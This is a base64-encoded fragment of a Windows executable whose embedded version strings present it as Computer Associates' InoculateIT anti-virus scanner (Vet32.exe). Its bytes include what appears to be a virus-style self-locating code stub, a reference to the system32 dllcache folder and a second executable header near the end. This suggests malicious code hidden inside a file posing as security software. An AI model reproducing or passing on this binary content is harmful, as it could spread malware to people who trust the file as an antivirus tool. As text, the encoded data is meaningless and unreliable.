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
ggACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAEAAQABAAEAAgAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAuAAAAAQAAANzS
QADM0kAAIAktDV0AAABdAAAAAAAAAAUAAMALAAAAAAAAAB0AAMAEAAAAAAAAAJYAAMAEAAAA
AAAAAI0AAMAIAAAAAAAAAI4AAMAIAAAAAAAAAI8AAMAIAAAAAAAAAJAAAMAIAAAAAAAAAJEA
AMAIAAAAAAAAAJIAAMAIAAAAAAAAAJMAAMAIAAAAAAAAAAMAAAAHAAAACgAAAIwAAAD/////
AAoAABAAAAAgBZMZAAAAAAAAAAAAAAAAAAAAAAIAAABI1UAACAAAABzVQAAJAAAA8NRAAAoA
AADM1EAAEAAAAKDUQAARAAAAcNRAABIAAABM1EAAEwAAACDUQAAYAAAA6NNAABkAAADA00AA
GgAAAIjTQAAbAAAAUNNAABwAAAAo00AAeAAAABjTQAB5AAAACNNAAHoAAAD40kAA/AAAAPTS
QAD/AAAA5NJAAAAAAAAAAAAAADtJAAAAAAAAO0kAAQEAAAAAAAAAAAAAABAAAAAAAAAAAAAA
AAAAAAAAAAACAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAACAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAACHEQAAhxEAAIcRAACHEQAAhxEAAIcRAAAAAAAAAAAAA+AMAAAAAAAAAAAAA
AAAAAAEAAAAWAAAAAgAAAAIAAAADAAAAAgAAAAQAAAAYAAAABQAAAA0AAAAGAAAACQAAAAcA
AAAMAAAACAAAAAwAAAAJAAAADAAAAAoAAAAHAAAACwAAAAgAAAAMAAAAFgAAAA0AAAAWAAAA
DwAAAAIAAAAQAAAADQAAABEAAAASAAAAEgAAAAIAAAAhAAAADQAAADUAAAACAAAAQQAAAA0A
AABDAAAAAgAAAFAAAAARAAAAUgAAAA0AAABTAAAADQAAAFcAAAAWAAAAWQAAAAsAAABsAAAA
DQAAAG0AAAAgAAAAcAAAABwAAAByAAAACQAAAAYAAAAWAAAAgAAAAAoAAACBAAAACgAAAIIA
AAAJAAAAgwAAABYAAACEAAAADQAAAJEAAAApAAAAngAAAA0AAAChAAAAAgAAAKQAAAALAAAA
pwAAAA0AAAC3AAAAEQAAAM4AAAACAAAA1wAAAAsAAAAYBwAADAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAwAAACgAAIAOAAAAQAAAgBAAAABYAACAAAAAAAAAAAAAAAAA
AAABAAEAAABwAACAAAAAAAAAAAAAAAAAAAABAGUAAACIAACAAAAAAAAAAAAAAAAAAAABAAEA
AACgAACAAAAAAAAAAAAAAAAAAAABAAkEAAC4AAAAAAAAAAAAAAAAAAAAAAABAAkEAADIAAAA
AAAAAAAAAAAAAAAAAAABAAkEAADYAAAA8FAJAOgCAAAAAAAAAAAAANhTCQAUAAAAAAAAAAAA
AADwUwkAoAQAAAAAAAAAAAAAAAAAAAAAAAAoAAAAIAAAAEAAAAABAAQAAAAAAIACAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAgAAAgAAAAICAAIAAAACAAIAAgIAAAMDAwACAgIAAAAD/AAD/
AAAA//8A/wAAAP8A/wD//wAA////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB3eAYAAAAAAAAA
AAAAAAd4gACAaAAAAAAAAAAAAAB4AId4CAaGAAAAAAAAAAAAAHd3eAAIaGAAAAAAAAAHgHd+
7ngAhoAAAAAAAAAHd4B47u54CAAAAAAAAAAAd3eAeO7ueAgGAAAAAAAAAHd3gHjud3gICGgA
AAAAAAB3d4B4d/93AIaGgAAAAAAAd5eAf/93cAhoAAAAAAAAAHd4iId3gAaAAAAAAAAAAAB4
h4iIiIAAAJmZmZAAAAAAh3eIiIiAAJmb57mZkAAAAHcHiIiIgAmbvb67u5kAAABw94iIiICZ
l+vn69vpkAAAf3eIiIiAnpl+fnu7fpkAAHd/iIiIgLu5l7u35+fpAAB/93eIiIC9vpm9vn5+
eZAA93d3d4iAu7e5m+frt+eQAAB3d3d3gL5+u5l+e9t+kAAAAHd3d3C367vpl+e755AAAAAA
d3AOfnvbfpl+vb6QAAAAAAAAl+fru+fpl7u3kAAAAAAAAJl7fn5+fpl+eZAAAAAAAAAJvbfn
5+fpl+kAAAAAAAAACZu+u367vpmZAAAAAAAAAACZ5727vbfpkAAAAAAAAAAACZ57u7u+mQAA
AAAAAAAAAACZl+fnmZAAAAAAAAAAAAAAAJmZmZAAAAAAAAAAAAAAAAAAAAAAAAAA///////w
P///gA///wAD//kAAf/gAAf/gAAf/4AAD/+AAAP/gAAB/4AAD/+AAH//gAPAf4ADAB+AAgAP
gAAAB4AAAAOAAAADgAAAAYAAAAHAAAAB8AAAAfwAAAH/EAAB//AAAf/4AAP/+AAD//wAB//+
AA///wAf///Af/////8AAAEAAQAgIBAAAQAEAOgCAAABAAAAAACgBDQAAABWAFMAXwBWAEUA
UgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQACAAoAAAAFAAIACgAAAAUAPwAAAAoA
AAAEAAAAAQAAAAAAAAAAAAAAAAAAAAAEAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYA
bwAAANwDAAABADAANAAwADkAMAA0AGUANAAAAEoAGQABAEMAbwBtAG0AZQBuAHQAcwAAAFcA
aQBuADMAMgAgAEEAbgB0AGkALQBWAGkAcgB1AHMAIABzAGMAYQBuAG4AZQByAAAAAABwACgA
AQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAEMAbwBtAHAAdQB0AGUAcgAgAEEAcwBzAG8A
YwBpAGEAdABlAHMAIABJAG4AdABlAHIAbgBhAHQAaQBvAG4AYQBsACwAIABJAG4AYwAuAAAA
bAAiAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAAEkAbgBvAGMAdQBsAGEA
dABlAEkAVAAgAEEAbgB0AGkALQBWAGkAcgB1AHMAIABQAHIAbwB0AGUAYwB0AGkAbwBuAAAA
QAAQAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAABWAGUAcgBzAGkAbwBuACAANQAuADIA
LgA1AC4AMAAAACwABgABAEkAbgB0AGUAcgBuAGEAbABOAGEAbQBlAAAAVgBlAHQAMwAyAAAA
oAA+AAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBvAHAAeQByAGkAZwBoAHQA
IACpACAAMQA5ADgAOQAtADIAMAAwADAAIABDAG8AbQBwAHUAdABlAHIAIABBAHMAcwBvAGMA
aQBhAHQAZQBzACAASQBuAHQAZQByAG4AYQB0AGkAbwBuAGEAbAAsACAASQBuAGMALgAAALQA
RgABAEwAZQBnAGEAbABUAHIAYQBkAGUAbQBhAHIAawBzAAAAAABJAG4AbwBjAHUAbABhAHQA
ZQBJAFQAIABpAHMAIABhACAAdAByAGEAZABlAG0AYQByAGsAIABvAGYAIABDAG8AbQBwAHUA
dABlAHIAIABBAHMAcwBvAGMAaQBhAHQAZQBzACAASQBuAHQAZQByAG4AYQB0AGkAbwBuAGEA
bAAsACAASQBuAGMALgAAADwACgABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUA
AABWAGUAdAAzADIALgBlAHgAZQAAAFoAHQABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAA
SQBuAG8AYwB1AGwAYQB0AGUASQBUACAAUABlAHIAcwBvAG4AYQBsACAARQBkAGkAdABpAG8A
bgAAAAAARAAQAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAVgBlAHIAcwBpAG8A
bgAgADUALgAyAC4ANQAuADAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQA
BAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAACQTkBAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATVqQAAMA
AAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
